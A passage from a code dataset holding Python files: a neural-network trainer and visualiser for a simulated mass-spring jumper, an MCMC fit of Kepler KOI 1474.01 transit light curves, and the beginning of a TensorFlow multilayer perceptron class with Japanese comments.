NeuralNet:\n def __init__(self, dimIn=2, dimOut=3, ls=np.array([3, 3, 3]), camera=None):\n self.ls = ls\n self.numLs = len(ls) + 1 # Layers count\n self.layers = []\n self.dimIn = dimIn\n self.dimOut = dimOut\n dimx = dimIn\n for i in range(self.numLs - 1):\n dimy = ls[i]\n l = Layer(dimx, dimy, actFunc=2)\n dimx = dimy\n self.layers.append(l)\n l = Layer(dimx, dimOut, actFunc=2)\n self.layers.append(l)\n\n # Training information\n self.yest = [] # Estimation of output\n self.err = [] # Error between estimation and output data\n self.j = 0 # Cost function output\n self.js = [] # All cost in training loop\n\n # Graph\n self.camera = camera\n self.inputNode = np.zeros(self.dimIn, dtype=Circle)\n self.edgeInput = np.zeros(self.dimIn)\n self.init_graph()\n\n def random_init_parameters(self):\n for l in self.layers:\n l.random_init_parameters()\n\n def save_network_structure(self, name='neural_network'):\n ls = self.ls\n num_ls = self.numLs\n dim_in = self.dimIn\n dim_out = self.dimOut\n layers_parameters = []\n for l in self.layers:\n layers_parameters.append(l.get_parameter())\n np.savez(name, ls=ls, num_ls=num_ls, dim_in=dim_in, dim_out=dim_out,\n layers_parameters=layers_parameters)\n\n def construct_from_file(self, name='neural_network.npz'):\n params = np.load(name, allow_pickle=True)\n self.ls = params['ls']\n self.numLs = len(self.ls)+1\n self.layers = []\n self.dimIn = params['dim_in']\n self.dimOut = params['dim_out']\n layers_parameters = params['layers_parameters']\n\n\n dimx = self.dimIn\n for i in range(self.numLs -1):\n dimy = self.ls[i]\n l = Layer(dimx, dimy)\n l.set_parameter(layers_parameters[i])\n dimx = dimy\n self.layers.append(l)\n l = Layer(dimx, self.dimOut)\n l.set_parameter(layers_parameters[-1])\n self.layers.append(l)\n print('Neural Network:')\n print('dim in: '+str(self.dimIn) + '\\t dim out: ' + str(self.dimOut))\n print('layers: ' + str(self.ls))\n\n self.init_graph()\n\n\n def init_graph(self, x=0., y=0., r=.2):\n b = 6. * r\n d = 3. * r\n offsetX = .5 * (self.numLs-1) * b\n offsetInputNodeY = .5*(self.dimIn-1) * d\n\n\n self.inputNode = np.zeros(self.dimIn, dtype=Circle)\n for i in range(self.dimIn):\n self.inputNode[i] = Circle(x=x-.5*b-offsetX, y=y+i*d-offsetInputNodeY, radius=r,\n s=0., v=.5, camera=self.camera)\n for i in range(self.numLs):\n self.layers[i].init_graph(x=x+b*i-offsetX, y=y, r=r, camera=self.camera)\n self.edgeInput = np.zeros(self.dimIn)\n\n\n def cal_output(self, input):\n x = input\n for i in range(self.numLs):\n x = self.layers[i].cal_output(x)\n # print('weight '+str(i))\n # print(self.layers[i].weight)\n # print('out:'+str(np.shape(x)))\n # print(x)\n return x\n # for l in self.layers:\n # x = l.cal_output(x)\n # return x\n\n def cal_output_grid(self, x):\n s = x.shape\n xv = x.reshape((-1, 2)).T\n y = self.cal_output(xv)\n y = y.reshape((s[0], s[1]))\n return y\n\n def backpropagation(self, djy, alpha):\n djx = djy\n for i in range(self.numLs):\n djx = self.layers[-i - 1].backpropagation(djx, alpha)\n\n def training(self, xdata, ydata, iteration=500, alpha=0.1, detect_vg=True, dynamic_step=False):\n print('training...')\n alpha_max = .6\n alpha_min = 0.001\n alpha_min0 = alpha_min\n alpha_max0 = alpha_max\n lock_max = False\n nvb_num = 10\n vibrate = 0\n notvibrate = 0\n alpha = alpha\n alpha0 = alpha\n data_num = xdata.shape[1]\n i = 0\n t0 = time.time()\n print('t:'+str(t0))\n while i < iteration:\n t_i = time.time()-t0\n left_num = iteration-i\n left_time = int(t_i*float(left_num)/float(i+1))\n left_sec = left_time%60\n left_min = int(left_time/60)\n left_hos = int(left_min/60)\n left_min = left_min%60\n # print(xdata)\n self.yest = self.cal_output(xdata)\n self.err = self.yest - ydata\n self.j = np.sum(self.err ** 2.)\n jj = self.j/data_num\n self.js.append(self.j)\n self.backpropagation(self.err, alpha)\n j_last = 0\n if i > 5:\n j_last = self.j - (self.js[i-4]-self.j)/4*left_num\n print('iter: ' + str(i) + '/'+str(iteration)+'\\tcost: '\\\n +str(round(float(self.j), 5)) + '\\tcost/n: '+str(round(float(jj),8))\\\n +'\\talpha: '+str(round(alpha,5))\\\n +'\\tremain: '+str(left_hos)+'h'+str(left_min)+'m'+str(left_sec)+'s')\n print('\\tcost end: '+str(round(j_last,3))+'\\tcost/n end: '+str(round(j_last/data_num, 8))\\\n +'\\talpha max: '+str(round(alpha_max,5)) + '\\talpha min: '+str(round(alpha_min,5)))\n # Detect vanishing gradient\n if detect_vg and self.j > 50 and i > 5 and abs(self.js[i-4] - self.js[i-1]) < 0.0001 and alpha == alpha_max or self.j > 8000:# or self.j != self.j:\n self.js = []\n self.random_init_parameters()\n i = 0\n alpha = alpha0\n vibrate = False\n alpha_max = alpha_max0\n alpha_min = alpha_min0\n print(self.js)\n print('restart...')\n # Dynamic change step size\n if dynamic_step and i > 15:\n # print('alpha max: '+str(round(alpha_max,5)) + '\\talpha min: '+str(round(alpha_min,5)))\n if self.js[i - 2] < self.js[i - 1]:\n vibrate += 1\n notvibrate = 0\n\n else:\n notvibrate += 1\n if notvibrate >= nvb_num:\n lock_max = False\n notvibrate = nvb_num\n vibrate = 0\n if notvibrate == nvb_num:\n if self.j > 1000 and self.js[i-2] - self.js[i-1] < 10.:\n alpha += 0.01\n if self.j <= 1000 and self.js[i-2] - self.js[i-1] < .1:\n alpha += 0.001\n alpha = min(alpha, alpha_max)\n elif self.j < 100 and self.js[i-4] - self.js[i-1] > 50. or vibrate:\n if not lock_max:\n alpha_max = alpha\n lock_max = True\n alpha_min = alpha_max * .5\n alpha -= 0.004\n alpha = max(alpha_min, alpha)\n\n\n i += 1\n\n def setInput(self, x):\n self.edgeInput = x\n\n def draw(self):\n for i in range(self.dimIn):\n self.inputNode[i].setColorV(self.edgeInput[i])\n self.inputNode[i].draw()\n x = self.edgeInput\n for l in range(self.numLs):\n self.layers[l].set_edge_input(x)\n self.layers[l].draw()\n x = self.layers[l].get_output()\n\n\n# TEST\n# Neural network test\ndef test_neural():\n camera = Camera(scale=100)\n camera.setY(0.0)\n nn = NeuralNet(dimIn=2, dimOut=2, ls=np.array([2, 2, 5]), camera=camera)\n nn.construct_from_file('mass_spring_neural_network.npz')\n # nn.save_network_structure()\n t = [0]\n @window.event\n def on_draw():\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n\n nn.draw()\n\n def update(dt, t):\n t[0] += dt\n w = 1.\n s = .5*np.sin(2.*np.pi*w*t[0])+.5\n c = .5*np.cos(2.*np.pi*w*t[0])+.5\n nn.setInput(np.array([s, c, s, c, s, c]).reshape(-1, 1))\n print(nn.cal_output(np.array([s, c, s, c, s, c]).reshape(-1, 1)))\n pyglet.clock.schedule_interval(update, t=t, interval=1.0 / 100.0)\n pyglet.app.run()\n# test_neural()\n\n# Sampling Learning data\n# learning data: shape:(6,num)\n# [vx_last, vy_last, y_last, vx_this, vy_this, y_this, angle_hit]'\ndef mass_spring_sampling_data(num=10, fast_mode = False):\n def randomInit(vx_mean=0., vx_range=5., vy_mean=0., vy_range=5.,\n y_mean=3., y_range=2., rad_mean=-np.pi*.5, rad_range=-np.pi/3.):\n y = y_mean + 2. * (np.random.random() - .5) * y_range\n vx = vx_mean + 2. * (np.random.random() - .5) * vx_range\n vy = vy_mean + 2. * (np.random.random() - .5) * vy_range\n rad = rad_mean + 2. * (np.random.random() - .5) * rad_range\n return vx,vy,y,rad\n\n camera = Camera(scale=90)\n camera.setY(1.5)\n jumper = MassSpring(camera=camera)\n g = Ground(l=100,camera=camera)\n num = num\n vx,vy,y,rad = randomInit()\n jumper.init(0, y, rad, vx, vy)\n sample = [vx, vy, y, 0, 0, 0, rad]\n data = np.zeros((7, num))\n state = [0, 0] # state[0]: last state; state[1] = this state\n i = [0]\n\n @window.event\n def on_draw():\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n jumper.draw()\n g.draw()\n\n def update(dt, sample, data, state, i, num):\n jumper.update(dt=0.01, control=False)\n # camera.setX(jumper.x)\n state[0] = state[1]\n state[1] = jumper.state\n if state[0] == 1 and state[1] != state[0] and i[0] < num:\n sample[3:-1] = [jumper.vx, jumper.vy, jumper.y]\n data[:, i[0]] = sample\n sample_display = [round(v, 3) for v in sample]\n print('sample '+str(i[0]+1)+'\\tvx0,vy0,y0,vx1,vy1,y1,rad: '+str(sample_display))\n i[0] += 1\n if i[0] == num:\n name = 'mass_spring_learning_data_'+str(int(num/1000))+'_k'\n np.save(name, data)\n print('sample ok')\n vx, vy, y, rad = randomInit()\n jumper.init(0, y, rad, vx, vy)\n sample[:] = [vx, vy, y, 0, 0, 0, rad]\n state[:] = [0,0]\n elif state[1] == 2:\n vx, vy, y, rad = randomInit()\n jumper.init(0, y, rad, vx, vy)\n sample[:] = [vx, vy, y, 0, 0, 0, rad]\n state[:] = [0, 0]\n\n if fast_mode:\n while(i[0] <= num):\n update(dt=0.01, sample=sample, data=data, state=state, i=i, num=num)\n\n\n else:\n pyglet.clock.schedule_interval(update,interval=1./100.,\n sample=sample, data=data, state=state, i=i, num=num)\n pyglet.app.run()\n# mass_spring_sampling_data(50000, fast_mode=True)\n\n# Mass spring 5 input neural network\ndef mass_spring_learning_5_input():\n def normalize_data(input_data, output_data, vx_range=10., vy_range=10., y_min=.2, y_max=5.,\n rad_min=-np.pi*5./6., rad_max=-np.pi/6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], -vy_range, vy_range)\n input_data[2, :] = remap(input_data[2, :], y_min, y_max)\n input_data[3, :] = remap(input_data[3, :], -vx_range, vx_range)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n data = np.load('mass_spring_learning_data_100k.npy')\n data = np.array(data)\n # Save to excel\n # data_pd = pd.DataFrame(data.T, columns=['vx0', 'vy0', 'y0', 'vx1', 'vy1', 'y1', 'rad'])\n # data_pd.to_excel('mass_spring_learning_data_100k.xlsx')\n vy1 = data[4, :]\n vy1[vy1 > 3] = 2.\n vy1[(vy1 <= 3.) * (vy1 >= 0.5)] = 1.\n vy1[vy1 < 0.5] = 0.\n input_data = np.vstack([data[:4, :], vy1])\n output_data = data[-1, :]\n\n learning_num = 40000\n input_data = input_data[:, :learning_num]\n output_data = output_data[:learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=5, dimOut=1, ls=15*np.ones(1, dtype=int))\n # nn.save_network_structure('mass_spring_nn_5_inputs_20_layers_30k_samples_1st_loop')\n nn.construct_from_file('mass_spring_nn_5_inputs_20_layers_10k_samples.npz')\n nn.training(input_data, output_data, iteration=8000, alpha=0.1, detect_vg=True)\n nn.save_network_structure(name='mass_spring_nn_5_inputs_20_layers_10k_samples')\n# mass_spring_learning_5_input()\n\n# Mass spring 4 input neural network\n# input: [vx0, y0, vx1, y1]; output:[rad]\ndef mass_spring_learning_4_input():\n def normalize_data(input_data, output_data, vx_range=10., vy_range=10., y_min=.2, y_max=5.,\n rad_min=-np.pi * 5. / 6., rad_max=-np.pi / 6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], y_min, y_max)\n input_data[2, :] = remap(input_data[2, :], -vx_range, vx_range)\n input_data[3, :] = remap(input_data[3, :], y_min, y_max)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n\n data = np.load('mass_spring_learning_data_50k.npy')\n data = np.array(data)\n vx0 = data[0, :]\n vy0 = data[1, :]\n y0 = data[2, :]\n vx1 = data[3, :]\n vy1 = data[4, :]\n y1 = data[5, :]\n y0_top = y0 + .5*vy0**2/gravity\n y1[vy1 > 0] += .5*vy1[vy1>0]**2/gravity\n y1[vy1 <= 0] = 0.2\n input_data = np.vstack([vx0, y0_top, vx1, y1])\n output_data = data[-1, :]\n\n learning_num = 50000\n input_data = input_data[:, :learning_num]\n output_data = output_data[:learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=4, dimOut=1, ls=10*np.ones(5, dtype=int))\n # nn.save_network_structure('mass_spring_nn_4_input_1st_loop')\n # nn.construct_from_file('mass_spring_nn_4_input.npz')\n nn.training(input_data, output_data, iteration=30000, alpha=0.1, detect_vg=True)\n nn.save_network_structure(name='mass_spring_nn_4_input_1')\n# mass_spring_learning_4_input()\n\n# Mass spring 4 input neural network\n# input: [vx0, y0, vx1, y1_fuzzy] output: [rad]\ndef mass_spring_learning_4_input_fuzzy():\n def normalize_data(input_data, output_data, vx_range=10., vy_range=10., y_min=.2, y_max=5.,\n rad_min=-np.pi * 5. / 6., rad_max=-np.pi / 6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], y_min, y_max)\n input_data[2, :] = remap(input_data[2, :], -vx_range, vx_range)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n\n data = np.load('mass_spring_learning_data_50k.npy')\n data = np.array(data)\n vx0 = data[0, :]\n vy0 = data[1, :]\n y0 = data[2, :]\n vx1 = data[3, :]\n vy1 = data[4, :]\n y1 = data[5, :]\n y0_top = y0 + .5*vy0**2/gravity\n y1[vy1 > 0] = 1.\n y1[vy1 <= 0] = 0.\n input_data = np.vstack([vx0, y0_top, vx1, y1])\n output_data = data[-1, :]\n # np.save('mass_spring_learning_data_norm_50k.npy', np.vstack([input_data,output_data]))\n\n learning_num = 40000\n input_data = input_data[:, :learning_num]\n output_data = output_data[:learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=4, dimOut=1, ls=10*np.ones(20, dtype=int))\n # nn.save_network_structure('mass_spring_nn_4_input_1st_loop')\n nn.construct_from_file('mass_spring_nn_4_input_fuzzy_deep_1.npz')\n nn.training(input_data, output_data, iteration=10000, alpha=0.0001, detect_vg=True, dynamic_step=True)\n nn.save_network_structure(name='mass_spring_nn_4_input_fuzzy_deep_2')\nmass_spring_learning_4_input_fuzzy()\n\n# Mass spring Learning from learning data\ndef mass_spring_learning_6_input():\n def normalize_data(input_data,output_data,vx_range=10., vy_range=10., y_min=.2, y_max=5., \n rad_min=-np.pi*5./6., rad_max=-np.pi/6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], -vy_range, vy_range)\n input_data[2, :] = remap(input_data[2, :], y_min, y_max)\n input_data[3, :] = remap(input_data[3, :], -vx_range, vx_range)\n input_data[4, :] = remap(input_data[4, :], -vy_range, vy_range)\n input_data[5, :] = remap(input_data[5, :], y_min, y_max)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n\n data = np.load('mass_spring_learning_data_100k.npy')\n data = np.array(data)\n # d = pd.DataFrame(data.T, columns=['vx0', 'vy0', 'y0', 'vx1', 'vy1', 'y1', 'rad'])\n # d.to_excel('mass_spring_learning_data.xls')\n learning_num = 20000\n input_data = data[:-1, :learning_num]\n output_data = data[-1, :learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=6, dimOut=1, ls=10*np.ones(3, dtype=int))\n nn.construct_from_file('mass_spring_nn_5.npz')\n nn.training(input_data, output_data, iteration=4000, alpha=0.1, detect_vg=True)\n nn.save_network_structure(name='mass_spring_nn_5')\n# nn = mass_spring_learning_6_input()\n\n# Mass spring let's jump\ndef mass_spring_jump():\n camera = Camera(scale=80)\n camera.setY(1.5)\n ground = Ground(l=100, camera=camera)\n\n jumpers = []\n num = 2\n for i in range(num):\n j = MassSpring(y=3.5, camera=camera)\n j.set_jump_dst(vx_dst=0., y_dst=1.)\n j.head.setColorH(i/float(num))\n jumpers.append(j)\n jumpers[0].construct_neural_network_from_file('mass_spring_nn_4_input_fuzzy_2.npz')\n jumpers[1].construct_neural_network_from_file('mass_spring_nn_4_input_fuzzy_deep_1.npz')\n\n t = [0]\n @window.event\n def on_draw():\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n\n ground.draw()\n for j in jumpers:\n j.draw()\n def update(dt, t):\n x = 0\n for j in range(len(jumpers)):\n if jumpers[j].x < 500:\n jumpers[j].set_jump_dst(vx_dst=0., y_dst=1.)\n else:\n jumpers[j].set_jump_dst(vx_dst=0., y_dst=1.)\n jumpers[j].update(dt=dt, control=True)\n print('jumper '+str(j)+'\\tx: '+str(round(jumpers[j].x,3))+'\\tvx: '+str(round(jumpers[j].vx,3)))\n x += jumpers[j].x\n x /= len(jumpers)\n camera.setX(jumpers[0].x)\n\n pyglet.clock.schedule_interval(update, t=t, interval=1/100)\n pyglet.app.run()\n# mass_spring_jump()\n\n\n\n\n","sub_path":"AboutAI.py","file_name":"AboutAI.py","file_ext":"py","file_size_in_byte":53221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"241250162","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, absolute_import\nimport sys\nimport emcee\nimport time as timer\nimport triangle\nimport matplotlib.pyplot as pl\nimport numpy as np\nimport scipy.optimize as op\n\nimport kplr\nfrom kplr.ld import get_quad_coeffs\n\nimport bart\nfrom bart.parameters import Parameter, LogParameter, ImpactParameter\nfrom bart.priors import UniformPrior\n\n# Get the KOI.\nclient = kplr.API()\nkoi = client.koi(\"1474.01\")\nperiod, t0, dt = koi.koi_period, koi.koi_time0bk, 2.0\nt0 = t0 % period\n\nnp.seterr(all=\"raise\")\n\n# Load the light curves.\nlcs = koi.get_light_curves(fetch=True)\ndatasets = []\nfor lc in lcs:\n with lc.open() as f:\n data = f[1].data\n longcadence = f[0].header.get(\"obsmode\") == \"long cadence\"\n\n if longcadence:\n datasets += bart.data.GPLightCurve(data[\"time\"], data[\"sap_flux\"],\n data[\"sap_flux_err\"],\n l2=1.0,\n period=period, t0=t0,\n dt=dt).autosplit()\n else:\n continue\n datasets += bart.data.LightCurve(data[\"time\"], data[\"sap_flux\"],\n data[\"sap_flux_err\"],\n period=period, t0=t0,\n texp=kplr.EXPOSURE_TIMES[0],\n dt=dt).autosplit()\n\n# Get the limb darkening profile.\nkic = koi.star\nteff, logg, feh = kic.kic_teff, kic.kic_logg, kic.kic_feh\nassert teff is not None\nmu1, mu2 = get_quad_coeffs(teff, logg=logg, feh=feh)\nbins = np.linspace(0, 1, 50)[1:] ** 0.5\nldp = bart.ld.QuadraticLimbDarkening(mu1, mu2, bins=bins)\n\n# Set up the star.\nstar = bart.Star(ldp=ldp)\n\n# Set up the planet.\na = star.get_semimajor(period)\nincl = np.degrees(np.arctan2(a, 0.883)) # This looks better than KOI.\nplanet = bart.Planet(0.069, a, t0=t0, ix=90.-incl) # Same.\n\n# Figure out the transit timing ranges.\nranges = [(np.min(d.time), np.max(d.time)) for d in datasets]\n\n# Set up the system/model.\nps = bart.VariationalSystem(ranges, star, var_t0=0.1, var_ix=0.1)\nps.add_planet(planet)\nmodel = bart.Model(ps)\n\n# Estimate the transit time offsets.\nttparams = []\nfor d in datasets:\n deltat = d.estimate_deltat(model, period, t0, 0.15)\n if deltat is not None:\n ps.delta_t0[0] = deltat\n ttparams.append(Parameter(ps, \"delta_t0\"))\n ttparams.append(Parameter(ps, \"delta_ix\"))\n model.datasets.append(d)\n\nphys_pars = [\n Parameter(star.ldp, \"gamma1\", lnprior=UniformPrior(0, 1)),\n Parameter(star.ldp, \"gamma2\", lnprior=UniformPrior(0, 1)),\n LogParameter(star, \"mass\"),\n Parameter(planet, \"r\", lnprior=UniformPrior(0, 1)),\n ImpactParameter(planet),\n LogParameter(planet, \"a\")\n]\nphys_bounds = [(0, 1), (0, 1), (None, None), (0, 1), (0, 1), (None, None)]\n\nhyper_pars = [\n LogParameter([d for d in model.datasets\n if hasattr(d, \"alpha\")], \"alpha\"),\n LogParameter([d for d in model.datasets\n if hasattr(d, \"l2\")], \"l2\")\n]\nhyper_bounds = [(None, None) for p in hyper_pars]\n\ntime_pars = [Parameter(planet, \"t0\"), LogParameter(ps, \"var_t0\"),\n LogParameter(ps, \"var_ix\")] + ttparams\ntime_bounds = [(None, None) for p in time_pars]\n\nif \"--restart\" not in sys.argv:\n def chi2(p):\n lnp = model(p)\n return -2*lnp\n\n for pars, bounds in zip([time_pars, phys_pars],\n [time_bounds, phys_bounds]):\n model.parameters = pars\n result = op.minimize(chi2, model.vector, method=\"L-BFGS-B\",\n bounds=bounds)\n model.vector = result[\"x\"]\n\nmodel.parameters = phys_pars + hyper_pars + time_pars\nprint(model.lnprob())\n\nimport cPickle as pickle\npickle.dump(model, open(\"model.pkl\", \"w\"), -1)\n\n# Plot initial predictions.\noffset = 3e-3\nfor i, d in enumerate(model.datasets):\n pl.plot(d.time % period, d.flux + offset * i, \".\")\n pl.plot(d.time % period, d.predict(model) + offset * i, \"k\")\npl.xlim(t0 - dt, t0 + dt)\npl.savefig(\"initial.png\")\n\n# Start sampling.\nfn = \"samples.txt\"\nv = model.vector\ntruth = np.array(v)\n\nif \"--results\" not in sys.argv:\n # Set up sampler.\n nwalkers = 64\n\n if \"--restart\" in sys.argv:\n samples = np.loadtxt(fn)\n p0 = samples[-nwalkers:, :-1]\n else:\n p0 = v[None, :] + (1e-5 * np.random.randn(len(v) * nwalkers)).reshape(\n (nwalkers, len(v)))\n\n sampler = emcee.EnsembleSampler(nwalkers, len(p0[0]), model,\n threads=nwalkers)\n\n # Run a burn-in.\n print(\"Burning in\")\n pos, lnprob, state = sampler.run_mcmc(p0, 10, storechain=False)\n sampler.reset()\n\n print(\"Sampling\")\n with open(fn, \"w\") as f:\n f.write(\"# {0}\\n\".format(\" \".join(map(unicode, model.parameters))))\n\n strt = timer.time()\n for pos, lnprob, state in sampler.sample(pos, lnprob0=lnprob,\n iterations=5000,\n storechain=False):\n with open(fn, \"a\") as f:\n for p, lp in zip(pos, lnprob):\n f.write(\"{0} {1}\\n\".format(\n \" \".join(map(\"{0}\".format, p)), lp))\n\n print(\"Took {0} seconds\".format(timer.time() - strt))\n print(\"Acceptance fraction: {0}\"\n .format(np.mean(sampler.acceptance_fraction)))\n\nsamples = np.loadtxt(fn)\nfigure = triangle.corner(np.concatenate([samples,\n np.atleast_2d(\n np.arange(len(samples))).T],\n axis=1),\n labels=map(unicode, model.parameters) + [\"lnp\", \"t\"],\n )\nfigure.savefig(\"triangle.png\")\n\n# Plot predictions.\npl.figure(figsize=(5, 10))\nfor i, d in enumerate(model.datasets):\n t = (d.time - t0 + 0.5 * period) % period - 0.5 * period\n pl.plot(t, d.flux + offset * i, \".\")\n\ninds = np.random.randint(len(samples), size=24)\nfor sample in samples[inds]:\n model.vector = sample[:-1]\n for i, d in enumerate(model.datasets):\n t = (d.time - t0 + 0.5 * period) % period - 0.5 * period\n pl.plot(t, d.predict(model) + i * offset, \"k\", alpha=0.2)\n\npl.xlabel(\"time from transit [days]\")\npl.savefig(\"prediction.png\")\n\n# Plot limb darkening.\npl.figure()\nr = np.linspace(0, 1, 500)\nfor sample in samples[inds]:\n model.vector = sample[:-1]\n pl.plot(r, star.ldp(r) / star.ldp.norm, \"k\", alpha=0.2)\npl.savefig(\"ldp.png\")\n","sub_path":"examples/koi1474/koi1474.py","file_name":"koi1474.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"528514672","text":"# -*- coding:utf-8 -*-\r\n# Anaconda 4.3.0 環境 (TensorFlow インストール済み)\r\n\r\n\"\"\"\r\n 更新情報\r\n [17/10/14] : 新規作成\r\n [17/11/19] : NeuralNetwrksBase クラスの子クラスになるように変更\r\n : \r\n\"\"\"\r\nimport numpy\r\n\r\n# TensorFlow ライブラリ\r\nimport tensorflow as tf\r\nfrom tensorflow.python.framework import ops\r\n\r\n# scikit-learn ライブラリ\r\nfrom sklearn.utils import shuffle\r\n\r\n# 自作クラス\r\nfrom NeuralNetworkBase import NeuralNetworkBase # 親クラス\r\n\r\nimport NNActivation\r\nfrom NNActivation import NNActivation # ニューラルネットワークの活性化関数を表すクラス\r\nfrom NNActivation import Sigmoid\r\nfrom NNActivation import Relu\r\nfrom NNActivation import Softmax\r\n\r\nimport NNLoss # ニューラルネットワークの損失関数を表すクラス\r\nfrom NNLoss import L1Norm\r\nfrom NNLoss import L2Norm\r\nfrom NNLoss import BinaryCrossEntropy\r\nfrom NNLoss import CrossEntropy\r\nfrom NNLoss import SoftmaxCrossEntropy\r\nfrom NNLoss import SparseSoftmaxCrossEntropy\r\n\r\nimport NNOptimizer # ニューラルネットワークの最適化アルゴリズム Optimizer を表すクラス\r\nfrom NNOptimizer import GradientDecent\r\nfrom NNOptimizer import Momentum\r\nfrom NNOptimizer import NesterovMomentum\r\nfrom NNOptimizer import Adagrad\r\nfrom NNOptimizer import Adadelta\r\n\r\n\r\nclass MultilayerPerceptron( NeuralNetworkBase ):\r\n \"\"\"\r\n 多層パーセプトロンを表すクラス\r\n TensorFlow での多層パーセプトロンの処理をクラス(任意の層に DNN 化可能な柔軟なクラス)でラッピングし、\r\n scikit-learn ライブラリの classifier, estimator とインターフェイスを共通化することで、\r\n scikit-learn ライブラリとの互換性のある自作クラス\r\n ----------------------------------------------------------------------------------------------------\r\n [public] public アクセス可能なインスタスンス変数には, 便宜上変数名の最後にアンダースコア _ を付ける.\r\n _n_inputLayer : int\r\n 入力層のノード数\r\n _n_hiddenLayers : shape = [h1,h2,h3,...] \r\n h1 : 1 つ目の隠れ層のユニット数、h2 : 2 つ目の隠れ層のユニット数、...\r\n _n_outputLayer : int\r\n 出力層のノード数\r\n\r\n _weights : list \r\n モデルの各層の重みの Variable からなる list\r\n _biases : list \r\n モデルの各層のバイアス項の Variable からなる list\r\n\r\n _epochs : int\r\n エポック数(トレーニング回数)\r\n _batch_size : int\r\n ミニバッチ学習でのバッチサイズ\r\n\r\n _losses_train : list \r\n トレーニングデータでの損失関数の値の list\r\n\r\n _activate_hiddenLayer : NNActivatation クラス\r\n 隠れ層からの活性化関数の種類\r\n _activate_outputLayer : NNActivatation クラス\r\n 出力層からの活性化関数\r\n \r\n _X_holder : placeholder\r\n 入力層にデータを供給するための placeholder\r\n _t_holder : placeholder\r\n 出力層に教師データを供給するための placeholder\r\n _keep_prob_holder : placeholder\r\n ドロップアウトしない確率 (1-p) にデータを供給するための placeholder\r\n \r\n [protedted] protedted な使用法を想定 \r\n\r\n [private] 変数名の前にダブルアンダースコア __ を付ける(Pythonルール)\r\n\r\n \"\"\"\r\n\r\n def __init__( \r\n self, \r\n session = tf.Session(), \r\n n_inputLayer = 1, n_hiddenLayers = [1,1,1], n_outputLayer = 1, \r\n activate_hiddenLayer = NNActivation(),\r\n activate_outputLayer = NNActivation(),\r\n epochs = 1000,\r\n batch_size = 1 \r\n ):\r\n \"\"\"\r\n コンストラクタ(厳密にはイニシャライザ)\r\n \"\"\"\r\n super().__init__( session )\r\n \r\n tf.set_random_seed(12)\r\n \r\n # 引数で指定された Session を設定\r\n self._session = session\r\n\r\n # 各パラメータの初期化\r\n self._n_inputLayer = n_inputLayer\r\n self._n_hiddenLayers = n_hiddenLayers\r\n self._n_outputLayer = n_outputLayer\r\n\r\n self._weights = []\r\n self._biases = []\r\n\r\n self._activate_hiddenLayer = activate_hiddenLayer\r\n self._activate_outputLayer = activate_outputLayer\r\n\r\n self._epochs = epochs\r\n self._batch_size = batch_size\r\n\r\n # evaluate 関連の初期化\r\n self._losses_train = []\r\n \r\n # placeholder の初期化\r\n # shape の列(横方向)は、各層の次元(ユニット数)に対応させる。\r\n # shape の行は、None にして汎用性を確保\r\n self._X_holder = tf.placeholder( tf.float32, shape = [None, self._n_inputLayer] )\r\n self._t_holder = tf.placeholder( tf.float32, shape = [None, self._n_outputLayer] )\r\n self._keep_prob_holder = tf.placeholder( tf.float32 )\r\n\r\n return\r\n \r\n def print( self, str ):\r\n print( \"----------------------------------\" )\r\n print( \"MultilayerPerceptron\" )\r\n print( self )\r\n print( str )\r\n\r\n print( \"_session : \", self._session )\r\n print( \"_init_var_op :\\n\", self._init_var_op )\r\n print( \"_loss_op :\", self._loss_op )\r\n print( \"_optimizer :\", self._optimizer )\r\n print( \"_train_step :\", self._train_step )\r\n print( \"_y_out_op :\", self._y_out_op )\r\n\r\n print( \"_epoches :\", self._epochs )\r\n print( \"_batch_size :\", self._batch_size )\r\n\r\n print( \"_n_inputLayer : \", self._n_inputLayer )\r\n print( \"_n_hiddenLayers : \", self._n_hiddenLayers )\r\n print( \"_n_outputLayer : \", self._n_outputLayer )\r\n print( \"_activate_hiddenLayer :\", self._activate_hiddenLayer )\r\n print( \"_activate_outputLayer :\", self._activate_outputLayer )\r\n\r\n print( \"_X_holder : \", self._X_holder )\r\n print( \"_t_holder : \", self._t_holder )\r\n print( \"_keep_prob_holder : \", self._keep_prob_holder )\r\n\r\n print( \"_weights : \\n\", self._weights )\r\n print( self._session.run( self._weights ) )\r\n\r\n print( \"_biases : \\n\", self._biases )\r\n print( self._session.run( self._biases ) )\r\n\r\n print( \"----------------------------------\" )\r\n return\r\n \r\n\r\n def init_weight_variable( self, input_shape ):\r\n \"\"\"\r\n 重みの初期化を行う。\r\n 重みは TensorFlow の Variable で定義することで、\r\n 学習過程(最適化アルゴリズム Optimizer の session.run(...))で自動的に TensorFlow により、変更される値となる。\r\n\r\n [Input]\r\n input_shape : [int,int]\r\n 重みの Variable を初期化するための Tensor の形状\r\n\r\n [Output]\r\n 正規分布に基づく乱数で初期化された重みの Variable \r\n session.run(...) はされていない状態。\r\n \"\"\"\r\n\r\n # ゼロで初期化すると、うまく重みの更新が出来ないので、正規分布に基づく乱数で初期化\r\n # tf.truncated_normal(...) : Tensor を正規分布なランダム値で初期化する\r\n init_tsr = tf.truncated_normal( shape = input_shape, stddev = 0.01 